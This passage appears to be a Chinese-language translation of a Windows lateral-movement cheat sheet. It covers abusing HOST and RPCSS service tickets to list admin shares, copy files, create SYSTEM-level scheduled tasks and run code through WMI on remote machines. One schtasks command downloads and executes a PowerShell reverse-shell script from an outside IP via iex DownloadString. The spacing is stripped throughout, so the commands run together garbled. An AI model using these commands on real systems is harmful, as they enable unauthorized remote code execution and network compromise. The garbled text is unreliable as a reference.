dir \\vulnerable.computer\C$dir \\vulnerable.computer\ADMIN$copyafile.txt \\vulnerable.computer\C$\Windows\Temp
主机
有了这个权限,您可以在远程计算机中生成计划任务并执行任意命令:
#Check you have permissions to use schtasks over a remote serverschtasks/Ssome.vuln.pc#Create scheduled task, first for exe execution, second for powershell reverse shell downloadschtasks/create/Ssome.vuln.pc/SCweekly/RU"NT Authority\System"/TN"SomeTaskName"/TR"C:\path\to\executable.exe"schtasks/create/Ssome.vuln.pc/SCWeekly/RU"NT Authority\SYSTEM"/TN"SomeTaskName"/TR"powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.114:8080/pc.ps1''')'"#Check it was successfully createdschtasks/query/Ssome.vuln.pc#Run created schtask nowschtasks/Run/Smcorp-dc.moneycorp.local/TN"SomeTaskName"
主机 + RPCSS
使用这些票据,您可以在受害系统中执行 WMI:
#Check you have enough privilegesInvoke-WmiMethod-classwin32_operatingsystem-ComputerNameremote.computer.local#Execute codeInvoke-WmiMethodwin32_process-ComputerName $Computer -namecreate-argumentlist"$RunCommand"#You can also use wmicwmicremote.computer.locallistfull/format:list